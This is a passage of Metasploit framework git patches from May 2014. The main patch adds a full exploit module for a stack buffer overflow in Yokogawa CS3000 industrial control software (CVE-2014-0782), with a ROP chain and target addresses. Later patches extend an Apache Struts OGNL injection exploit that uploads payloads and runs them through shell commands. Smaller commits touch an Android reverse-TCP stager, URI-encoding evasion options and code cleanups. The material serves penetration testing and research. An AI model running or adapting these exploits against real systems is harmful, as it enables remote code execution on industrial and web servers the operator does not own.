print_brute( :level => :vstatus, :msg => "Pair list is still building with #{remaining_pairs} pairs left to process" ) + next_message_time = Time.now + interval end remaining_pairs -= 1 end From f56ea019886d5b8e2f99f9490106041881cfa769 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 9 May 2014 10:27:41 -0500 Subject: [PATCH 270/853] Add module --- .../windows/scada/yokogawa_bkesimmgr_bof.rb | 160 ++++++++++++++++++ 1 file changed, 160 insertions(+) create mode 100644 modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb diff --git a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb new file mode 100644 index 0000000000..0fbfa732aa --- /dev/null +++ b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb @@ -0,0 +1,160 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow', + 'Description' => %q{ + This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability + exists in the BKESimmgr.exe service when handling specially crafted packets, due to an + insecure usage of memcpy, using attacker controlled data as the size count. This module + has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows + 2003 SP2. + }, + 'Author' => + [ + 'juan vazquez', + 'Redsadic ' + ], + 'References' => + [ + ['CVE', '2014-0782'], + ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'], + ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf'] + ], + 'Payload' => + { + 'Space' => 340, + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]', + { + 'Ret' => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll + 'Offset' => 64, + 'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe + 'FakeArgument2' => 0x0040EB90 # ptr to .data on BKESimmgr.exe + } + ], + ], + 'DisclosureDate' => 'Mar 10 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(34205) + ], self.class) + end + + def check + data = create_pkt(rand_text_alpha(4)) + + res = send_pkt(data) + + if res && res.length == 10 + simmgr_res = parse_response(res) + + if valid_response?(simmgr_res) + check_code = Exploit::CheckCode::Appears + else + check_code = Exploit::CheckCode::Safe + end + else + check_code = Exploit::CheckCode::Safe + end + + check_code + end + + def exploit + bof = rand_text(target['Offset']) + bof << [target.ret].pack("V") + bof << [target['FakeArgument1']].pack("V") + bof << [target['FakeArgument2']].pack("V") + bof << rand_text(16) # padding (corrupted bytes) + bof << create_rop_chain + bof << payload.encoded + + data = [0x1].pack("N") # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0 + data << [bof.length].pack("n") + data << bof + + pkt = create_pkt(data) + + print_status("Trying target #{target.name}, sending #{pkt.length} bytes...") + connect + sock.put(pkt) + disconnect + end + + def create_rop_chain + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x004047ca, # POP ECX # RETN [BKESimmgr.exe] + 0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll] + 0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll] + 0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll] + 0x619436d3, # POP EBP # RETN [libbkeeda.dll] + 0x61615424, # & push esp # ret [libbkeldc.dll] + 0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll] + 0x00000001, # 0x00000001-> ebx + 0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll] + 0x00001000, # 0x00001000-> edx + 0x0040765a, # POP ECX # RETN [BKESimmgr.exe] + 0x00000040, # 0x00000040-> ecx + 0x6191aaab, # POP EDI # RETN [libbkeeda.dll] + 0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll] + 0x00405ffa, # POP EAX # RETN [BKESimmgr.exe] + 0x90909090, # nop + 0x619532eb # PUSHAD # RETN [libbkeeda.dll] + ].pack("V*") + + rop_gadgets + end + + def create_pkt(data) + pkt = [0x01].pack("N") # Operation Identifier + pkt << [data.length].pack("n") # length + pkt << data # Fake packet + + pkt + end + + def send_pkt(data) + connect + sock.put(data) + res = sock.get_once + disconnect + + res + end + + def parse_response(data) + data.unpack("NnN") + end + + def valid_response?(data) + valid = false + + if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5 + valid = true + end + + valid + end + +end From ad83921a850660cdda818e2870936fc3a41c7ec8 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 9 May 2014 21:15:28 +0200 Subject: [PATCH 271/853] additional GET parameters --- .../multi/http/struts_code_exec_parameters.rb | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index ff29678af5..e78bf4d370 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -69,7 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote Opt::RPORT(8080), OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']), OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), - OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) + OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]), + OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do not URL encode the Parameters, they are encoded before sending by the module.', nil]), ], self.class) end @@ -77,6 +78,19 @@ class Metasploit3 < Msf::Exploit::Remote datastore['PARAMETER'] end + def get_parameter + retval = {} + return retval unless datastore['GET_PARAMETERS'] + splitted = datastore['GET_PARAMETERS'].split('&') + return retval if splitted.nil? || splitted.empty? + splitted.each { |item| + name, value = item.split('=') + # no check here, value can be nil if parameter is ¶m + retval[name] = value + } + retval + end + def execute_command(cmd) junk = Rex::Text.rand_text_alpha(6) inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" @@ -86,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => uri, 'version' => '1.1', 'method' => 'GET', - 'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' } + 'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' }.merge(get_parameter) }) resp end From 43a85fc645fbc88f7bb753018a0069558e432693 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 9 May 2014 21:21:04 +0200 Subject: [PATCH 272/853] additional GET parameters --- modules/exploits/multi/http/struts_code_exec_parameters.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index e78bf4d370..77ff5104d0 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']), OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]), - OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do not URL encode the Parameters, they are encoded before sending by the module.', nil]), + OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do apply URL encoding to the Parameters.', nil]), ], self.class) end @@ -86,7 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote splitted.each { |item| name, value = item.split('=') # no check here, value can be nil if parameter is ¶m - retval[name] = value + decoded_name = name ? Rex::Text::uri_decode(name) : nil + decoded_value = value ? Rex::Text::uri_decode(value) : nil + retval[decoded_name] = decoded_value } retval end From 38f3a19673381cca7f8fd6642ca73e52cae0e5e3 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 9 May 2014 14:35:06 -0500 Subject: [PATCH 273/853] Try to beautify description --- modules/exploits/multi/http/struts_code_exec_parameters.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index 77ff5104d0..f56abec251 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']), OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]), - OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do apply URL encoding to the Parameters.', nil]), + OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do apply URL encoding to the parameters names and values if needed.', nil]), ], self.class) end From 453851277f30571cf898afc111b8ff25befd1ea6 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 9 May 2014 17:08:45 -0500 Subject: [PATCH 274/853] Fix missing space in prompt for back and grep --- lib/msf/ui/console/command_dispatcher/core.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 89fbc0d903..8dedea55e2 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -344,7 +344,7 @@ class Core # Restore the prompt prompt = framework.datastore['Prompt'] || Msf::Ui::Console::Driver::DefaultPrompt prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar - driver.update_prompt("#{prompt}", prompt_char, true) + driver.update_prompt("#{prompt} ", prompt_char, true) end end @@ -2609,7 +2609,7 @@ class Core if mod # if there is an active module, give them the fanciness they have come to expect driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true) else - driver.update_prompt("#{prompt}", prompt_char, true) + driver.update_prompt("#{prompt} ", prompt_char, true) end # dump the command's output so we can grep it From dee6b531758cece12f321a210853516023ad57b9 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 10 May 2014 00:19:40 +0200 Subject: [PATCH 275/853] fix java payload struts module --- .../multi/http/struts_code_exec_parameters.rb | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index f56abec251..ce98a33357 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -71,6 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]), OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a¶m2=b". Do apply URL encoding to the parameters names and values if needed.', nil]), + OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. Ensure there is a trailing slash!', nil]) ], self.class) end @@ -78,6 +79,14 @@ class Metasploit3 < Msf::Exploit::Remote datastore['PARAMETER'] end + def temp_path + return nil unless datastore['TMP_PATH'] + unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') + fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH') + end + datastore['TMP_PATH'] + end + def get_parameter retval = {} return retval unless datastore['GET_PARAMETERS'] @@ -115,11 +124,12 @@ class Metasploit3 < Msf::Exploit::Remote #Now arch specific... case target['Platform'] when 'linux' - payload_exe = "/tmp/#{payload_exe}" + path = temp_path || '/tmp/' + payload_exe = "#{path}#{payload_exe}" chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))" exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{payload_exe}\".split(\"_\"))" when 'java' - payload_exe << ".jar" + payload_exe = "#{temp_path}#{payload_exe}.jar" pl_exe = payload.encoded_jar.pack exec_cmd = '' exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," @@ -131,12 +141,14 @@ class Metasploit3 < Msf::Exploit::Remote exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" when 'windows' - payload_exe = "./#{payload_exe}.exe" + path = temp_path || './' + payload_exe = "#{path}#{payload_exe}.exe" exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')" else fail_with(Failure::NoTarget, 'Unsupported target platform!') end + print_status("#{peer} - Uploading exploit to #{payload_exe}") #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length @@ -148,6 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote append = true end java_upload_part(pl_exe, payload_exe, append) + print_status("#{peer} - Executing payload") execute_command(chmod_cmd) if target['Platform'] == 'linux' execute_command(exec_cmd) register_files_for_cleanup(payload_exe) From 92a9519fd910de5c6dee7bbdbed113cc108fbd55 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 9 May 2014 18:34:12 -0500 Subject: [PATCH 276/853] Remove EOL spaces --- modules/auxiliary/scanner/http/ntlm_info_enumeration.rb | 2 +- modules/auxiliary/scanner/ssl/openssl_heartbleed.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 8afd0bdb73..c3c2036cf0 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('TARGET_URI', [ false, "Single target URI", nil]), - OptPath.new('TARGET_URIS_FILE', [ false, "Path to list of URIs to request", + OptPath.new('TARGET_URIS_FILE', [ false, "Path to list of URIs to request", File.join(Msf::Config.data_directory, "wordlists", "http_owa_common.txt")]), ], self.class) end diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 3cca563d4b..a5d6db0841 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -228,7 +228,7 @@ class Metasploit3 < Msf::Auxiliary # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3 # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html sock.get_once - # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), + # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), # int16(5679) in network format psql_sslrequest = [8].pack('N') psql_sslrequest << [1234, 5679].pack('n*') From ae0691c586b94b456ea588484d83aa944c566872 Mon Sep 17 00:00:00 2001 From: Tim Wright Date: Sat, 10 May 2014 17:00:25 +0100 Subject: [PATCH 277/853] make string replacement more robust --- modules/payloads/stagers/android/reverse_tcp.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index a2ed71120c..c4d263f72e 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -36,8 +36,8 @@ module Metasploit3 classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) - string_sub(classes, '127.0.0.1 ', datastore['LHOST'].to_s) if datastore['LHOST'] - string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'XXXX127.0.0.1 ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST'] + string_sub(classes, 'YYYY4444 ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT'] string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] jar.add_file("classes.dex", fix_dex_header(classes)) From a60558061cffc0dfb1fc1d31bb28b26d5e6521c7 Mon Sep 17 00:00:00 2001 From: Tim Wright Date: Sat, 10 May 2014 19:58:19 +0100 Subject: [PATCH 278/853] re-enable x86 stager --- .../exploits/android/browser/webview_addjavascriptinterface.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 9e3e7c232e..373fc8f2fd 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn # Since the NDK stager is used, arch detection must be performed - SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE ] # todo: , ARCH_X86 ] + SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ] # Most android devices are ARM DEFAULT_ARCH = ARCH_ARMLE From 557cd56d924ea614304d4dd59da6f200e1e04b7d Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 10 May 2014 23:31:02 +0200 Subject: [PATCH 279/853] fixed some ruby warnings --- modules/exploits/windows/firewall/blackice_pam_icq.rb | 2 +- modules/exploits/windows/misc/eureka_mail_err.rb | 2 +- modules/exploits/windows/misc/fb_svc_attach.rb | 6 ------ modules/exploits/windows/misc/ib_svc_attach.rb | 6 ------ modules/exploits/windows/misc/ibm_director_cim_dllinject.rb | 6 +++--- .../exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb | 2 +- modules/exploits/windows/misc/mirc_privmsg_server.rb | 2 +- modules/exploits/windows/misc/poppeeper_date.rb | 2 +- modules/exploits/windows/misc/talkative_response.rb | 2 +- modules/exploits/windows/misc/wireshark_lua.rb | 3 --- .../windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb | 5 +++-- modules/exploits/windows/mssql/mssql_linkcrawler.rb | 3 ++- 12 files changed, 14 insertions(+), 27 deletions(-) diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index 0dc06797de..c52735c975 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Payload' => { - 'Space' => 504 -31 -4, + 'Space' => 504-31-4, 'BadChars' => "\x00", 'MinNops' => 0, 'MaxNops' => 0, diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 84d95f81b5..71bb61e51d 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return unless regenerate_payload(client) # the offset to eip depends on the local ip address string length... already = "Your POP3 server had a problem.\n" diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index b9a8b0044a..71daee3976 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -70,12 +70,6 @@ class Metasploit3 < Msf::Exploit::Remote connect - # Attach database - op_attach = 19 - - # Create database - op_create = 20 - # Service attach op_service_attach = 82 diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb index 06b5546915..822aa33146 100644 --- a/modules/exploits/windows/misc/ib_svc_attach.rb +++ b/modules/exploits/windows/misc/ib_svc_attach.rb @@ -115,12 +115,6 @@ class Metasploit3 < Msf::Exploit::Remote connect - # Attach database - op_attach = 19 - - # Create database - op_create = 20 - # Service attach op_service_attach = 82 diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb index 7b6e5330cf..7584f318c6 100644 --- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb +++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb @@ -85,8 +85,8 @@ class Metasploit3 < Msf::Exploit::Remote end # If there is no subdirectory in the request, we need to redirect. - if (request.uri == '/') or not (request.uri =~ /\/[^\/]+\//) - if (request.uri == '/') + if request.uri == '/' || request.uri !~ /\/[^\/]+\// + if request.uri == '/' subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/' else subdir = request.uri + '/' @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote # dispatch based on extension if (request.uri =~ /\.dll$/i) print_status("Sending DLL") - return if ((p = regenerate_payload(cli)) == nil) + return unless regenerate_payload(cli) dll_payload = generate_payload_dll send_response(cli, dll_payload, { 'Content-Type' => 'application/octet-stream' }) else diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index bef570f7d3..faa807e07b 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Insufficient data from CAD service.") return nil end - rca_port = data[24,port_str_len].unpack('n*').pack('C*').to_i + data[24,port_str_len].unpack('n*').pack('C*').to_i end diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index 0f7ba57388..c6a426e5d6 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return unless regenerate_payload(client) print_status("Client connected! Sending payload...") buffer = ":my_irc_server.com 001 wow :Welcome to the #{datastore['SRVNAME']} wow\r\n" client.put(buffer) diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index 7493959322..da45e45485 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_client_data(client) - return if ((p = regenerate_payload(client)) == nil) + return unless regenerate_payload(client) ok = "+OK\r\n" client.put(ok) diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index 07ab018d5f..fbeeec1603 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_client_data(client) - return if ((p = regenerate_payload(client)) == nil) + return unless regenerate_payload(client) sploit = ":" + rand_text_alpha_upper(272) + Rex::Arch::X86.jmp_short(6) sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') + payload.encoded diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb index 63ca919ef1..eec34a0ff8 100644 --- a/modules/exploits/windows/misc/wireshark_lua.rb +++ b/modules/exploits/windows/misc/wireshark_lua.rb @@ -128,9 +128,6 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("Received WebDAV PROPFIND request: #{path}") body = '' - my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] - my_uri = "http://#{my_host}/" - if path !~ /\/$/ if path.index(".") print_status("Sending 404 for #{path} ...") diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 075012b678..c3595b637e 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -258,7 +258,8 @@ class Metasploit3 < Msf::Exploit::Remote # since we need to have credentials for this vuln, we just login and run a query # to get the version information - if not (version = mssql_query_version) + version = mssql_query_version + if not version return Exploit::CheckCode::Safe end print_status("@@version returned:\n\t" + version) @@ -430,7 +431,7 @@ exec sp_executesql @z| end # convert any bad stuff to char(0xXX) - if ((idx = badchars.index(ch.chr))) + if badchars.index(ch.chr) enc << "'" if in_str enc << "+char(0x%x)" % ch in_str = false diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 31dfc58a78..3d1e5d8d71 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -299,7 +299,8 @@ class Metasploit3 < Msf::Exploit::Remote # Openquery generator else exec_at = temp.shift - sql = "exec(" + "'"*2**ticks + query_builder_rpc(temp,sql,ticks+1,execute) + "'"*2**ticks +") at [" + exec_at + "]" + quotes = "'"*2**ticks + sql = "exec(#{quotes}#{query_builder_rpc(temp, sql,ticks + 1, execute)}#{quotes}) at [#{exec_at}]" return sql end end From 2b8dd9139c61072f914b2cfa2fefe837520c126e Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Sun, 11 May 2014 16:14:51 -0500 Subject: [PATCH 280/853] Fix cosmetic issue Fix cosmetic issue /w email address when it is output via 'info' or the Rapid7 module page. --- modules/post/multi/gather/wlan_geolocate.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index f3c7f957e7..be692cb345 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post Optionally geolocate the target by gathering local wireless networks and performing a lookup against Google APIs.}, 'License' => MSF_LICENSE, - 'Author' => [ 'Tom Sellers fadedcode.net>'], + 'Author' => [ 'Tom Sellers '], 'Platform' => %w{ osx win linux bsd solaris }, 'SessionTypes' => [ 'meterpreter', 'shell' ], )) From 5f523e8a04c2312db33d222c6975a6a18ce708f2 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc Date: Mon, 12 May 2014 11:26:27 -0500 Subject: [PATCH 281/853] Rex::Text::uri_encode - make 'hex-all' really mean all. 'hex-all' encoding was previously ignoring slashes. This pull adds 'hex-noslashes' mode which carries forward the previous functionality, and replaces all existing references to 'hex-all' with 'hex-noslashes' It then adds a replacement 'hex-all' mode, which really encodes *ALL* characters. --- lib/msf/core/exploit/http/client.rb | 2 +- lib/rex/proto/http/client_request.rb | 2 +- lib/rex/text.rb | 9 ++++++--- modules/exploits/multi/http/gitorious_graph.rb | 2 +- modules/exploits/multi/http/php_cgi_arg_injection.rb | 4 ++-- modules/exploits/multi/http/spree_search_exec.rb | 2 +- modules/exploits/multi/http/spree_searchlogic_exec.rb | 2 +- .../windows/browser/foxit_reader_plugin_url_bof.rb | 2 +- spec/lib/rex/proto/http/client_request_spec.rb | 4 ++-- 9 files changed, 16 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index b32e4fa0c7..b6f8474cec 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -58,7 +58,7 @@ module Exploit::Remote::HttpClient register_evasion_options( [ - OptEnum.new('HTTP::uri_encode_mode', [false, 'Enable URI encoding', 'hex-normal', ['none', 'hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-all', 'u-random']]), + OptEnum.new('HTTP::uri_encode_mode', [false, 'Enable URI encoding', 'hex-normal', ['none', 'hex-normal', 'hex-noslashes', 'hex-random', 'hex-all', 'u-normal', 'u-all', 'u-random']]), OptBool.new('HTTP::uri_full_url', [false, 'Use the full URL for all HTTP requests', false]), OptInt.new('HTTP::pad_method_uri_count', [false, 'How many whitespace characters to use between the method and uri', 1]), 